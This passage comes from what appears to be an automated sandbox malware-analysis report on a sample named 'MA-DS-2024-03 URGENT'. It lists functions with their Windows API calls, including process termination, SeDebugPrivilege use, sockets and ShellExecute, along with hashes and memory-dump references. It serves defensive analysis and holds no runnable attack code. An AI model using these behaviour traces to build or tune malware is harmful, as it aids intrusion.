                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                        • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                                        • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                        • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                                        Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                                        • _wcscat.LIBCMT ref: 00486EAD
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: SysListView32
                                                        • API String ID: 307300125-78025650
                                                        • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                        • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                        • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                        • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                        Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                          • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                          • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                        • GetLastError.KERNEL32 ref: 0047E9B7
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                        • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                        • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                        • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                                        • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                        • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                                        Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                        • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                        • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                        • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                        Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                        • LoadStringW.USER32(00000000), ref: 00464319
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                        • LoadStringW.USER32(00000000), ref: 00464336
                                                        • _wprintf.LIBCMT ref: 0046435C
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                        • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                        • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                        • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                        Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                        • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                        • String ID:
                                                        • API String ID: 1211466189-0
                                                        • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                        • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                                        • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                        • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                                        Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                        • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                                        • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                        • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                                        Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                        • _memmove.LIBCMT ref: 0046717E
                                                        • _memmove.LIBCMT ref: 0046719B
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: 213dcb69f08e90a3214936643a53b2f01f87464f0b4a5ec3784c7ca1ee61912b
                                                        • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                                        • Opcode Fuzzy Hash: 213dcb69f08e90a3214936643a53b2f01f87464f0b4a5ec3784c7ca1ee61912b
                                                        • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                                        Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 004861EB
                                                        • GetDC.USER32(00000000), ref: 004861F3
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                        • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                                        • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                        • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                                        Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                        • _wcstok.LIBCMT ref: 0046EC94
                                                        • _wcscpy.LIBCMT ref: 0046ED23
                                                        • _memset.LIBCMT ref: 0046ED56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        • Opcode ID: 00c44fd0456e6776c2cb9920ccbdf31a6f078f0f6385dc9967b9e231e6ac4661
                                                        • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                                        • Opcode Fuzzy Hash: 00c44fd0456e6776c2cb9920ccbdf31a6f078f0f6385dc9967b9e231e6ac4661
                                                        • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                                        Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                                                        • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                                          • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                                          • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                                        • _strlen.LIBCMT ref: 00476D44
                                                        • _memmove.LIBCMT ref: 00476DAD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3619996494-0
                                                        • Opcode ID: 797864c79ab37bc07f1d3297885ab41e08d19cdc990a08f6e5d314172132acee
                                                        • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                                                        • Opcode Fuzzy Hash: 797864c79ab37bc07f1d3297885ab41e08d19cdc990a08f6e5d314172132acee
                                                        • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                                                        Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                        • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                                        • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                        • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                                        Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(00A83C28), ref: 0048B3EB
                                                        • IsWindowEnabled.USER32(00A83C28), ref: 0048B3F7
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                        • SendMessageW.USER32(00A83C28,000000B0,?,?), ref: 0048B512
                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                        • GetWindowLongW.USER32(00A83C28,000000EC), ref: 0048B571
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                        • String ID:
                                                        • API String ID: 4072528602-0
                                                        • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                        • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                                        • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                        • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                                        Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0047F448
                                                        • _memset.LIBCMT ref: 0047F511
                                                        • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                        • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                        • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
